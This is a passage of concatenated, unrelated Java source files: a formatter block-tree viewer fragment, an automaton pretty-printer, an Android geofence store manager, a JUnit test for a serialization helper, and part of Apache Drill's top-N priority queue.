currentPsiEl.getTextLength() != blockLength) {
currentPsiEl = currentPsiEl.getParent();
}
final BlockTreeStructure treeStructure = ObjectUtils.notNull((BlockTreeStructure)myBlockTreeBuilder.getTreeStructure());
BlockTreeNode rootBlockNode = treeStructure.getRootElement();
int baseOffset = 0;
if (rootBlockNode != null) {
baseOffset = rootBlockNode.getBlock().getTextRange().getStartOffset();
}
TextRange range = descriptor.getBlock().getTextRange();
range = range.shiftRight(-baseOffset);
myUpdater.updatePsiTree(currentPsiEl, myBlockTree.hasFocus() ? range : null);
}
}
@Nullable
private BlockTreeNode findBlockNode(TextRange range) {
final BlockTreeBuilder builder = myBlockTreeBuilder;
if (builder == null || !myBlockStructurePanel.isVisible()) {
return null;
}
AbstractTreeStructure treeStructure = builder.getTreeStructure();
if (treeStructure == null) return null;
BlockTreeNode node = (BlockTreeNode)treeStructure.getRootElement();
main_loop:
while (true) {
if (node.getBlock().getTextRange().equals(range)) {
return node;
}
for (BlockTreeNode child : node.getChildren()) {
if (child.getBlock().getTextRange().contains(range)) {
node = child;
continue main_loop;
}
}
return node;
}
}
@Nullable
private static Block buildBlocks(@NotNull PsiElement rootElement) {
FormattingModelBuilder formattingModelBuilder = LanguageFormatting.INSTANCE.forContext(rootElement);
CodeStyleSettings settings = CodeStyleSettingsManager.getSettings(rootElement.getProject());
if (formattingModelBuilder != null) {
FormattingModel formattingModel = formattingModelBuilder.createModel(rootElement, settings);
return formattingModel.getRootBlock();
}
else {
return null;
}
}
private void initMap(BlockTreeNode rootBlockNode, PsiElement psiEl) {
myPsiToBlockMap = new HashMap<>();
JBTreeTraverser<BlockTreeNode> traverser = new JBTreeTraverser<>(o -> JBIterable.of(o.getChildren()));
for (BlockTreeNode block : traverser.withRoot(rootBlockNode)) {
PsiElement currentElem = null;
if (block.getBlock() instanceof ASTBlock) {
ASTNode node = ((ASTBlock)block.getBlock()).getNode();
if (node != null) {
currentElem = node.getPsi();
}
}
if (currentElem == null) {
currentElem =
InjectedLanguageUtil
.findElementAtNoCommit(psiEl.getContainingFile(), block.getBlock().getTextRange().getStartOffset());
}
myPsiToBlockMap.put(currentElem, block);
//nested PSI elements with same ranges will be mapped to one blockNode
      // assert currentElem != null; //for Scala-language plugin etc it can be null, because formatterBlocks is not instance of ASTBlock
      if (currentElem == null) continue; // skip blocks with no matching PSI element to avoid an NPE below
      TextRange curTextRange = currentElem.getTextRange();
PsiElement parentElem = currentElem.getParent();
while (parentElem != null && parentElem.getTextRange().equals(curTextRange)) {
myPsiToBlockMap.put(parentElem, block);
parentElem = parentElem.getParent();
}
}
}
}
|
|
// Copyright (c) 2011, David J. Pearce ([email protected])
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// * Neither the name of the <organization> nor the
// names of its contributors may be used to endorse or promote products
// derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
// ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
// WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
// DISCLAIMED. IN NO EVENT SHALL DAVID J. PEARCE BE LIABLE FOR ANY
// DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
// LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
// ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
// SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
package wyautl.io;
import java.io.*;
import java.util.Arrays;
import java.util.HashSet;
import wyautl.core.*;
/**
* <p>
* Responsible for writing an automaton in a textual format to an output stream.
* Obviously, it cannot know how to handle the supplementary data that can be
* provided as part of a state. Therefore, if the automaton contains states
* which have supplementary data, the client is expected to deal with this.
* </p>
* <p>
* <b>NOTE:</b> By default, this class completely ignores any supplementary
 * data. To allow writing this data, the client should extend this class and
 * override the method <code>write(Automata.State)</code>. In such a case, it is
 * recommended that <code>super.write(state)</code> is called before writing the
* supplementary data. In other words, the standard information (i.e. kind and
* children) for a state comes first, and the supplementary data is placed after
* that.
* </p>
*
* @author David J. Pearce
*
*/
public class PrettyAutomataWriter {
private final PrintWriter writer;
private final Schema schema;
private final HashSet<String> indents;
private int level;
private boolean indices;
public PrettyAutomataWriter(PrintStream stream, Schema schema, String... indents) {
this(new PrintWriter(stream),schema,indents);
}
public PrettyAutomataWriter(OutputStream stream, Schema schema, String... indents) {
this(new OutputStreamWriter(stream),schema,indents);
}
public PrettyAutomataWriter(PrintWriter stream, Schema schema, String... indents) {
this.writer = stream;
this.schema = schema;
this.indents = new HashSet<String>();
for(String indent : indents) {
this.indents.add(indent);
}
}
public PrettyAutomataWriter(Writer stream, Schema schema, String... indents) {
this.writer = new PrintWriter(stream);
this.schema = schema;
this.indents = new HashSet<String>();
for(String indent : indents) {
this.indents.add(indent);
}
}
public void setIndices(boolean flag) {
indices = flag;
}
public void write(Automaton automaton) throws IOException {
int[] headers = new int[automaton.nStates()];
for (int i = 0; i != automaton.nRoots(); ++i) {
Arrays.fill(headers, 0);
int root = automaton.getRoot(i);
Automata.traverse(automaton, root, headers);
write(root, headers, automaton, false);
}
writer.flush();
}
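	/*
	 * Illustrative only: typical use of this writer, assuming a Schema instance ("schema") and an
	 * Automaton ("automaton") obtained elsewhere; the indent names passed here are made up.
	 *
	 *   PrettyAutomataWriter writer = new PrettyAutomataWriter(System.out, schema, "And", "Or");
	 *   writer.write(automaton); // writes every root of the automaton
	 *   writer.flush();
	 */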
public void write(int root, Automaton automaton) throws IOException {
int[] headers = new int[automaton.nStates()];
Arrays.fill(headers, 0);
Automata.traverse(automaton, root, headers);
write(root, headers, automaton, false);
writer.flush();
}
protected void write(int index, int[] headers, Automaton automaton,
boolean indent) throws IOException {
int header = 0;
if(index >= 0) {
header = headers[index];
if(header == 3) {
writer.print("$" + index + "<");
headers[index] = -1; // mark the header
} else if(header < 0) {
writer.print("$" + index);
return;
}
}
Automaton.State state = automaton.get(index);
if (state instanceof Automaton.Constant) {
write((Automaton.Constant) state, headers, automaton, indent);
} else if (state instanceof Automaton.Term) {
if(indices) {
writer.print(index + ":");
}
write((Automaton.Term) state, headers, automaton, indent);
} else {
write((Automaton.Collection) state, headers, automaton, indent);
}
if(header == 3) {
writer.print(">");
}
}
protected void write(Automaton.Constant item, int[] headers, Automaton automaton, boolean indent) throws IOException {
Object payload = item.value;
if (payload instanceof String) {
writer.print("\"" + payload.toString() + "\"");
} else {
// default
writer.print(payload.toString());
}
}
protected void write(Automaton.Term term, int[] headers, Automaton automaton,
boolean indent) throws IOException {
String name = schema.get(term.kind).name;
indent = indents.contains(name);
writer.print(name);
Schema.State element = schema.get(term.kind).child;
if (element != null && element instanceof Schema.Collection) {
write(term.contents, headers, automaton, indent);
} else if (element != null) {
writer.print("(");
write(term.contents, headers, automaton, indent);
writer.print(")");
}
}
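	/*
	 * Illustrative only: a minimal sketch of the extension point described in the class javadoc.
	 * The subclass name and the way supplementary data is fetched are assumptions, not part of wyautl.
	 *
	 *   class AnnotatedAutomataWriter extends PrettyAutomataWriter {
	 *       AnnotatedAutomataWriter(PrintWriter out, Schema schema, String... indents) {
	 *           super(out, schema, indents);
	 *       }
	 *       @Override
	 *       protected void write(Automaton.Term term, int[] headers, Automaton automaton,
	 *               boolean indent) throws IOException {
	 *           super.write(term, headers, automaton, indent); // standard kind/children first
	 *           // ... then print whatever supplementary data is associated with this term.
	 *       }
	 *   }
	 */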
protected void write(Automaton.Collection state, int[] headers, Automaton automaton, boolean indent) throws IOException {
switch(state.kind) {
case Automaton.K_LIST:
writer.print("[");
break;
case Automaton.K_BAG:
writer.print("{|");
break;
case Automaton.K_SET:
writer.print("{");
break;
}
if(indent) {
level++;
}
for(int i=0;i!=state.size();++i) {
if(i != 0) {
writer.print(",");
}
if(indent) {
writer.println();
indent();
}
write(state.get(i),headers,automaton,false);
}
if(indent) {
level--;
writer.println();
indent();
}
switch(state.kind) {
case Automaton.K_LIST:
writer.print("]");
break;
case Automaton.K_BAG:
writer.print("|}");
break;
case Automaton.K_SET:
writer.print("}");
break;
}
}
public void close() throws IOException {
writer.close();
}
public void flush() throws IOException {
writer.flush();
}
private void indent() {
for(int i=0;i<level;++i) {
writer.print("\t");
}
}
}
|
|
package com.sousoum.jcvd;
import android.content.Context;
import android.support.annotation.NonNull;
import android.support.annotation.Nullable;
import android.support.annotation.VisibleForTesting;
import android.util.Log;
import com.google.android.gms.common.api.ResultCallback;
import com.google.android.gms.common.api.Status;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Set;
/**
* Class that manages addition and deletion of Fences in the Google API Client.
* It uses a store to remember all fences that are currently in the Google API Client.
 * The store is currently backed by the shared preferences.
*/
public class StorableFenceManager {
/**
* Informs about fence addition or removal status
*/
public interface Listener {
/**
* Called when a fence has been, successfully or not, added to the Google API Client
* @param fence the fence that has been added
* @param status the status of the operation
*/
void fenceAddStatus(StorableFence fence, Status status);
/**
* Called when a fence has been, successfully or not, removed from the Google API Client
* @param fenceId the id of the fence that has been removed
* @param status the status of the operation
*/
void fenceRemoveStatus(String fenceId, Status status);
}
private static final String TAG = "FenceManager";
private static final String TO_ADD_STORE = "TO_ADD_STORE";
private static final String TO_REMOVE_STORE = "TO_REMOVE_STORE";
private static final String SYNCED_STORE = "SYNCED_STORE";
private final Context mContext;
private Listener mListener;
@VisibleForTesting
final FenceStore mToAddStore; // store of the fence to add to the Google API Client
@VisibleForTesting
final FenceStore mToRemoveStore; // store of the fence to remove from the Google API Client
@VisibleForTesting
final FenceStore mSyncedStore; // store that represent which fences are in the Google API Client
private final GapiFenceManager mGapiFenceManager;
/**
* Constructor.
*
* @param context a context
*/
public StorableFenceManager(Context context) {
mContext = context;
mToAddStore = new FenceStore(context, TO_ADD_STORE);
mToRemoveStore = new FenceStore(context, TO_REMOVE_STORE);
mSyncedStore = new FenceStore(context, SYNCED_STORE);
mGapiFenceManager = createGapiFenceManager();
synchronizeNonCommittedFencesToGoogleApi();
}
@VisibleForTesting
protected GapiFenceManager createGapiFenceManager() {
return new GapiFenceManager(mContext);
}
/**
     * Set the listener. This listener will be informed when the fences are modified in the Google API Client.
* @param listener a listener
*/
public void setListener(Listener listener) {
mListener = listener;
}
/**
* Get the current listener
* @return the current listener
*/
public Listener getListener() {
return mListener;
}
/**
     * Add a fence to the store.
     * This will also add the fence to the Google API Client if it is connected. If not, it will trigger a connection.
     * This call requires that the following permissions are granted:
     * - ACCESS_FINE_LOCATION if one of the fences is a {@link StorableLocationFence}
     * - ACTIVITY_RECOGNITION if one of the fences is a {@link StorableActivityFence}
     * @param id the unique id of the fence. You will be able to get the fence with this id.
     * @param storableFence the fence to store
     * @param pendingIntentClassName the class name of the pending intent to call when the fence becomes valid.
*/
public void addFence(@NonNull String id, @NonNull StorableFence storableFence,
@NonNull String pendingIntentClassName) {
addFence(id, storableFence, null, pendingIntentClassName);
}
/**
     * Add a fence to the store.
     * This will also add the fence to the Google API Client if it is connected. If not, it will trigger a connection.
     * This call requires that the following permissions are granted:
     * - ACCESS_FINE_LOCATION if one of the fences is a {@link StorableLocationFence}
     * - ACTIVITY_RECOGNITION if one of the fences is a {@link StorableActivityFence}
     * @param id the unique id of the fence. You will be able to get the fence with this id.
     * @param storableFence the fence to store
     * @param additionalData a hash map associated with this fence. Can be null.
     * @param pendingIntentClassName the class name of the pending intent to call when the fence becomes valid.
*/
public void addFence(@NonNull String id, @NonNull StorableFence storableFence,
@Nullable HashMap<String, Object> additionalData,
@NonNull String pendingIntentClassName) {
storableFence.setId(id);
storableFence.setAdditionalData(additionalData);
storableFence.setPendingIntentClass(pendingIntentClassName);
mToAddStore.storeFence(storableFence);
FenceAddStatus addStatus = new FenceAddStatus(storableFence);
mGapiFenceManager.addFence(id, storableFence.getAwarenessFence(mContext),
pendingIntentClassName, addStatus);
}
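    /*
     * Illustrative only: a minimal usage sketch built from the methods declared in this class.
     * How the StorableFence itself is created (e.g. via StorableLocationFence) is out of scope here,
     * and MyFenceReceiver is a hypothetical pending-intent class name.
     *
     *   StorableFenceManager manager = new StorableFenceManager(context);
     *   manager.setListener(new Listener() {
     *       @Override
     *       public void fenceAddStatus(StorableFence fence, Status status) {
     *           Log.i("Sample", "add status: " + status);
     *       }
     *       @Override
     *       public void fenceRemoveStatus(String fenceId, Status status) {
     *           Log.i("Sample", "remove status: " + status);
     *       }
     *   });
     *   StorableFence fence = ...; // built elsewhere
     *   manager.addFence("home", fence, null, MyFenceReceiver.class.getName());
     *   // later, when the fence is no longer needed:
     *   manager.removeFence("home");
     */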
/**
* Ask to remove a fence from the store.
     * If the Google API Client is not connected, this triggers a connection.
     * Otherwise, the fence is removed from the Google API Client and, if the operation succeeds, from the store.
* @param fenceId The id of the fence to remove
*/
public void removeFence(@NonNull String fenceId) {
mToRemoveStore.storeFenceId(fenceId);
FenceRemoveStatus removeStatus = new FenceRemoveStatus(fenceId);
mGapiFenceManager.removeFence(fenceId, removeStatus);
}
/**
* Resynchronize all fences to the Google API Client.
* This means that the already stored fences will be re-submitted and that the
* {@link StorableFenceManager#synchronizeNonCommittedFencesToGoogleApi()} function will be
* called.
*/
@VisibleForTesting(otherwise=VisibleForTesting.PACKAGE_PRIVATE)
public void synchronizeAllToGoogleApi() {
Log.i(TAG, "Resynchronize all fences");
// first, add all (already) stored fences, without listener
ArrayList<StorableFence> storedFences = mSyncedStore.getAllFences();
if (!storedFences.isEmpty()) {
// for each fence, add it to the Google API Client
for (StorableFence storableFence : storedFences) {
if ((storableFence.getId() != null) &&
(storableFence.getPendingIntentClass() != null)) {
mGapiFenceManager.addFence(storableFence.getId(), storableFence.getAwarenessFence(mContext),
storableFence.getPendingIntentClass(), null);
}
Log.i(TAG, "Added " + storableFence);
}
Log.i(TAG, "All already stored fences have been submitted to be synchronized with Google API Client");
}
// then synchronize non-committed fences
synchronizeNonCommittedFencesToGoogleApi();
}
/**
     * Ask to synchronize all non-committed changes to the Google API Client
* (i.e. add the fences that are in the toAddStore and remove the fences that are in the
* toRemoveStore)
*/
private void synchronizeNonCommittedFencesToGoogleApi() {
        Log.i(TAG, "Synchronize non-committed fences");
// add all fences from the to add list
ArrayList<StorableFence> toAddFences = mToAddStore.getAllFences();
if (!toAddFences.isEmpty()) {
// for each fence, add it to the Google API Client
for (StorableFence storableFence : toAddFences) {
FenceAddStatus addStatus = new FenceAddStatus(storableFence);
if ((storableFence.getId() != null) &&
(storableFence.getPendingIntentClass() != null)) {
mGapiFenceManager.addFence(storableFence.getId(), storableFence.getAwarenessFence(mContext),
storableFence.getPendingIntentClass(), addStatus);
}
Log.i(TAG, "Added " + storableFence);
}
Log.i(TAG, "All fences to add have been submitted to be synchronized with Google API Client");
}
// remove all fences from the to remove list
Set<String> toRemoveFences = mToRemoveStore.getAllFenceIds();
if (!toRemoveFences.isEmpty()) {
// TODO: use only one request!
            // for each fence, remove it from the Google API Client
for (String fenceId : toRemoveFences) {
FenceRemoveStatus removeStatus = new FenceRemoveStatus(fenceId);
mGapiFenceManager.removeFence(fenceId, removeStatus);
Log.i(TAG, "Removed " + fenceId);
}
Log.i(TAG, "All fences to remove have been submitted to be synchronized with Google API Client");
}
}
/**
* Get all stored fences that are synced with Google API Client.
     * @return a list of StorableFence (cannot be null)
*/
public @NonNull
ArrayList<StorableFence> getAllFences() {
return mSyncedStore.getAllFences();
}
/**
* Get a stored fence which is synced with Google API Client.
* @param id the id of the searched fence
* @return a StorableFence that matches the given id
*/
public StorableFence getFence(String id) {
StorableFence storableFence = null;
if (id != null) {
ArrayList<StorableFence> allGeo = getAllFences();
for (StorableFence currentFence : allGeo) {
if (currentFence.getId() != null && currentFence.getId().equals(id)) {
storableFence = currentFence;
break;
}
}
}
return storableFence;
}
//region Result callbacks
    /**
     * Inner class that responds to the ResultCallback when a fence has been, successfully or not,
     * removed from the Google API Client.
     */
    private class FenceRemoveStatus implements ResultCallback<Status> {
        private final String mFenceId;
public FenceRemoveStatus(@NonNull String fenceId) {
mFenceId = fenceId;
}
@Override
public void onResult(@NonNull Status status) {
if (status.isSuccess()) {
Log.i(TAG, "Removed successfully fence " + mFenceId + " to the Google API");
// since the operation is successful, remove from the local store
mSyncedStore.removeFence(mFenceId);
mToRemoveStore.removeFence(mFenceId);
} else {
Log.e(TAG, "Error : fence not removed. Error is " + status.getStatusMessage() + "(code : " + status.getStatusCode() + ")");
}
if (mListener != null) {
mListener.fenceRemoveStatus(mFenceId, status);
}
}
}
    /**
     * Inner class that responds to the ResultCallback when a fence has been, successfully or not,
     * added to the Google API Client.
     */
    private class FenceAddStatus implements ResultCallback<Status> {
        private final StorableFence mFence;
public FenceAddStatus(@NonNull StorableFence fence) {
mFence = fence;
}
@Override
public void onResult(@NonNull Status status) {
if (status.isSuccess()) {
Log.i(TAG, "Added successfully fence " + mFence + " to the Google API");
                // since the operation succeeded, record the fence in the synced store
                mSyncedStore.storeFence(mFence);
                // the id cannot be null here because it was set before the fence was stored
assert mFence.getId() != null;
mToAddStore.removeFence(mFence.getId());
} else {
Log.e(TAG, "Error : fence not added. Error is " + status.getStatusMessage() + "(code : " + status.getStatusCode() + ")");
}
if (mListener != null) {
mListener.fenceAddStatus(mFence, status);
}
}
}
//endregion Result callbacks
}
|
|
package net.morimekta.providence.util;
import net.morimekta.test.providence.core.CompactFields;
import net.morimekta.test.providence.core.Containers;
import net.morimekta.test.providence.core.DefaultFields;
import net.morimekta.test.providence.core.OptionalFields;
import net.morimekta.test.providence.core.calculator.Operand;
import net.morimekta.test.providence.core.calculator.Operation;
import net.morimekta.test.providence.core.calculator.Operator;
import net.morimekta.test.providence.core.number.Imaginary;
import net.morimekta.util.Binary;
import org.junit.Before;
import org.junit.Test;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.List;
import static net.morimekta.providence.util.ProvidenceHelper.debugString;
import static net.morimekta.providence.util.ProvidenceHelper.getTargetModifications;
import static org.hamcrest.CoreMatchers.hasItems;
import static org.hamcrest.CoreMatchers.instanceOf;
import static org.hamcrest.CoreMatchers.is;
import static org.hamcrest.Matchers.hasSize;
import static org.hamcrest.collection.IsEmptyCollection.empty;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertThat;
/**
* Tests for reading json resources.
*/
public class ProvidenceHelperTest {
@Test
public void testGetTargetModifications() {
OptionalFields._Builder b1 = getTargetModifications(OptionalFields.builder().build(),
OptionalFields.builder().build());
assertThat(b1.modifiedFields(), is(empty()));
OptionalFields source = OptionalFields.builder()
.setBinaryValue(Binary.fromBase64("abcd"))
.setStringValue("old")
.setIntegerValue(321)
.build();
OptionalFields target = OptionalFields.builder()
.setStringValue("new")
.setLongValue(1234L)
.setIntegerValue(321)
.build();
OptionalFields._Builder b2 = getTargetModifications(source, target);
assertThat(b2.modifiedFields(), hasItems(OptionalFields._Field.BINARY_VALUE,
OptionalFields._Field.STRING_VALUE,
OptionalFields._Field.LONG_VALUE));
assertThat(b2.modifiedFields(), hasSize(3));
assertThat(b2.build(), is(target));
}
@Test
public void testFromJsonResource_compact() throws IOException {
Operation op = net.morimekta.providence.util.ProvidenceHelper.fromJsonResource("/json/calculator/compact.json", Operation.kDescriptor);
Operation expected = Operation.builder()
.setOperator(Operator.MULTIPLY)
.addToOperands(Operand.builder()
.setOperation(Operation.builder()
.setOperator(Operator.ADD)
.addToOperands(Operand.builder()
.setNumber(1234)
.build())
.addToOperands(Operand.builder()
                                                            .setNumber(4.321)
.build())
.build())
.build())
.addToOperands(Operand.builder()
.setImaginary(Imaginary.builder()
.setV(1.7)
.setI(-2.0)
.build())
.build())
.build();
assertEquals(op, expected);
}
@Test
public void testFromJsonResource_named() throws IOException {
Operation op = net.morimekta.providence.util.ProvidenceHelper.fromJsonResource("/json/calculator/named.json", Operation.kDescriptor);
Operation expected = Operation.builder()
.setOperator(Operator.MULTIPLY)
.addToOperands(Operand.builder()
.setOperation(Operation.builder()
.setOperator(Operator.ADD)
.addToOperands(Operand.builder()
.setNumber(1234)
.build())
.addToOperands(Operand.builder()
                                                            .setNumber(4.321)
.build())
.build())
.build())
.addToOperands(Operand.builder()
.setImaginary(Imaginary.builder()
.setV(1.7)
.setI(-2.0)
.build())
.build())
.build();
assertEquals(op, expected);
}
@Test
public void testFromJsonResource_pretty() throws IOException {
Operation op = net.morimekta.providence.util.ProvidenceHelper.fromJsonResource("/json/calculator/pretty.json", Operation.kDescriptor);
Operation expected = Operation.builder()
.setOperator(Operator.MULTIPLY)
.addToOperands(Operand.builder()
.setOperation(Operation.builder()
.setOperator(Operator.ADD)
.addToOperands(Operand.builder()
.setNumber(1234)
.build())
.addToOperands(Operand.builder()
                                                            .setNumber(4.321)
.build())
.build())
.build())
.addToOperands(Operand.builder()
.setImaginary(Imaginary.builder()
.setV(1.7)
.setI(-2.0)
.build())
.build())
.build();
assertEquals(op, expected);
}
@Test
public void testArrayListFromJsonResource() throws IOException {
List<Containers> pretty = net.morimekta.providence.util.ProvidenceHelper.arrayListFromJsonResource("/compat/pretty.json",
Containers.kDescriptor);
List<Containers> compact = net.morimekta.providence.util.ProvidenceHelper.arrayListFromJsonResource("/compat/compact.json",
Containers.kDescriptor);
assertEquals(10, pretty.size());
assertEquals(pretty.size(), compact.size());
for (int i = 0; i < 10; ++i) {
assertEquals(debugString(compact.get(i)), debugString(pretty.get(i)));
}
}
private Operation mOperation;
@Before
public void setUp() {
mOperation = Operation.builder()
.setOperator(Operator.MULTIPLY)
.addToOperands(Operand.builder()
.setOperation(Operation.builder()
.setOperator(Operator.ADD)
.addToOperands(Operand.builder()
.setNumber(1234)
.build())
.addToOperands(Operand.builder()
.setNumber(4.321)
.build())
.build())
.build())
.addToOperands(Operand.builder()
.setImaginary(Imaginary.builder()
.setV(1.7)
.setI(-2.0)
.build())
.build())
.build();
}
@Test
public void testDebugString() {
assertEquals("{\n" +
" operator = MULTIPLY\n" +
" operands = [\n" +
" {\n" +
" operation = {\n" +
" operator = ADD\n" +
" operands = [\n" +
" {\n" +
" number = 1234\n" +
" },\n" +
" {\n" +
" number = 4.321\n" +
" }\n" +
" ]\n" +
" }\n" +
" },\n" +
" {\n" +
" imaginary = {\n" +
" v = 1.7\n" +
" i = -2\n" +
" }\n" +
" }\n" +
" ]\n" +
"}", ProvidenceHelper.debugString(mOperation));
}
@Test
public void testParseDebugString() {
assertEquals(mOperation, ProvidenceHelper.parseDebugString(
"{\n" +
" operator = MULTIPLY\n" +
" operands = [\n" +
" {\n" +
" operation = {\n" +
" operator = ADD\n" +
" operands = [\n" +
" {\n" +
" number = 1234\n" +
" },\n" +
" {\n" +
" number = 4.321\n" +
" }\n" +
" ]\n" +
" }\n" +
" },\n" +
" {\n" +
" imaginary = {\n" +
" v = 1.7\n" +
" i = -2\n" +
" }\n" +
" }\n" +
" ]\n" +
"}", Operation.kDescriptor));
}
@Test
public void testOptionalInMessage() {
DefaultFields defaultFields = DefaultFields
.builder()
.setCompactValue(CompactFields.builder()
.setId(1234)
.setLabel("bar")
.build())
.build();
String label = ProvidenceHelper
.<String>optionalInMessage(defaultFields,
DefaultFields._Field.COMPACT_VALUE,
CompactFields._Field.LABEL).orElseThrow(() -> new AssertionError(
"No label"));
assertThat(label, is("bar"));
}
@Test
public void testConstructor()
throws NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException {
Constructor<ProvidenceHelper> constructor = ProvidenceHelper.class.getDeclaredConstructor();
assertThat(constructor.isAccessible(), is(false));
try {
constructor.setAccessible(true);
assertThat(constructor.newInstance(), is(instanceOf(ProvidenceHelper.class)));
} finally {
constructor.setAccessible(false);
}
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.drill.exec.physical.impl.TopN;
import io.netty.buffer.DrillBuf;
import java.util.concurrent.TimeUnit;
import javax.inject.Named;
import org.apache.drill.exec.exception.SchemaChangeException;
import org.apache.drill.exec.memory.BufferAllocator;
import org.apache.drill.exec.ops.FragmentContext;
import org.apache.drill.exec.physical.impl.sort.RecordBatchData;
import org.apache.drill.exec.record.BatchSchema;
import org.apache.drill.exec.record.ExpandableHyperContainer;
import org.apache.drill.exec.record.MaterializedField;
import org.apache.drill.exec.record.RecordBatch;
import org.apache.drill.exec.record.VectorContainer;
import org.apache.drill.exec.record.selection.SelectionVector2;
import org.apache.drill.exec.record.selection.SelectionVector4;
import com.google.common.base.Stopwatch;
public abstract class PriorityQueueTemplate implements PriorityQueue {
private static final org.slf4j.Logger logger = org.slf4j.LoggerFactory.getLogger(PriorityQueueTemplate.class);
private SelectionVector4 heapSv4; //This holds the heap
private SelectionVector4 finalSv4; //This is for final sorted output
private ExpandableHyperContainer hyperBatch;
private FragmentContext context;
private BufferAllocator allocator;
private int limit;
private int queueSize = 0;
private int batchCount = 0;
private boolean hasSv2;
@Override
public void init(int limit, FragmentContext context, BufferAllocator allocator, boolean hasSv2) throws SchemaChangeException {
this.limit = limit;
this.context = context;
this.allocator = allocator;
final DrillBuf drillBuf = allocator.buffer(4 * (limit + 1));
heapSv4 = new SelectionVector4(drillBuf, limit, Character.MAX_VALUE);
this.hasSv2 = hasSv2;
}
@Override
public void resetQueue(VectorContainer container, SelectionVector4 v4) throws SchemaChangeException {
assert container.getSchema().getSelectionVectorMode() == BatchSchema.SelectionVectorMode.FOUR_BYTE;
BatchSchema schema = container.getSchema();
VectorContainer newContainer = new VectorContainer();
for (MaterializedField field : schema) {
int[] ids = container.getValueVectorId(field.getPath()).getFieldIds();
newContainer.add(container.getValueAccessorById(field.getValueClass(), ids).getValueVectors());
}
newContainer.buildSchema(BatchSchema.SelectionVectorMode.FOUR_BYTE);
hyperBatch = new ExpandableHyperContainer(newContainer);
batchCount = hyperBatch.iterator().next().getValueVectors().length;
final DrillBuf drillBuf = allocator.buffer(4 * (limit + 1));
heapSv4 = new SelectionVector4(drillBuf, limit, Character.MAX_VALUE);
for (int i = 0; i < v4.getTotalCount(); i++) {
heapSv4.set(i, v4.get(i));
}
v4.clear();
doSetup(context, hyperBatch, null);
}
@Override
public void add(FragmentContext context, RecordBatchData batch) throws SchemaChangeException{
Stopwatch watch = new Stopwatch();
watch.start();
if (hyperBatch == null) {
hyperBatch = new ExpandableHyperContainer(batch.getContainer());
} else {
hyperBatch.addBatch(batch.getContainer());
}
doSetup(context, hyperBatch, null); // may not need to do this every time
int count = 0;
SelectionVector2 sv2 = null;
if (hasSv2) {
sv2 = batch.getSv2();
}
for (; queueSize < limit && count < batch.getRecordCount(); count++) {
heapSv4.set(queueSize, batchCount, hasSv2 ? sv2.getIndex(count) : count);
queueSize++;
siftUp();
}
for (; count < batch.getRecordCount(); count++) {
heapSv4.set(limit, batchCount, hasSv2 ? sv2.getIndex(count) : count);
if (compare(limit, 0) < 0) {
swap(limit, 0);
siftDown();
}
}
batchCount++;
if (hasSv2) {
sv2.clear();
}
logger.debug("Took {} us to add {} records", watch.elapsed(TimeUnit.MICROSECONDS), count);
}
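  /*
   * Note on the technique (informal, added for clarity): heapSv4 holds at most `limit` entries
   * arranged so that index 0 compares greatest under doEval(). Once the queue is full, each new
   * record is staged in the spare slot at index `limit` and admitted only when compare(limit, 0) < 0,
   * i.e. when it displaces the current root. Assuming doEval() implements ascending order, a queue
   * with limit 3 fed the values 5, 1, 4, 2 ends up retaining {1, 2, 4}: the 2 evicts the 5.
   */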
@Override
public void generate() throws SchemaChangeException {
Stopwatch watch = new Stopwatch();
watch.start();
final DrillBuf drillBuf = allocator.buffer(4 * queueSize);
finalSv4 = new SelectionVector4(drillBuf, queueSize, 4000);
for (int i = queueSize - 1; i >= 0; i--) {
finalSv4.set(i, pop());
}
logger.debug("Took {} us to generate output of {}", watch.elapsed(TimeUnit.MICROSECONDS), finalSv4.getTotalCount());
}
@Override
public VectorContainer getHyperBatch() {
return hyperBatch;
}
@Override
public SelectionVector4 getHeapSv4() {
return heapSv4;
}
@Override
public SelectionVector4 getFinalSv4() {
return finalSv4;
}
@Override
public void cleanup() {
heapSv4.clear();
hyperBatch.clear();
}
private void siftUp() {
int p = queueSize - 1;
while (p > 0) {
if (compare(p, (p - 1) / 2) > 0) {
swap(p, (p - 1) / 2);
p = (p - 1) / 2;
} else {
break;
}
}
}
private void siftDown() {
int p = 0;
int next;
while (p * 2 + 1 < queueSize) {
if (p * 2 + 2 >= queueSize) {
next = p * 2 + 1;
} else {
if (compare(p * 2 + 1, p * 2 + 2) >= 0) {
next = p * 2 + 1;
} else {
next = p * 2 + 2;
}
}
if (compare(p, next) < 0) {
swap(p, next);
p = next;
} else {
break;
}
}
}
public int pop() {
int value = heapSv4.get(0);
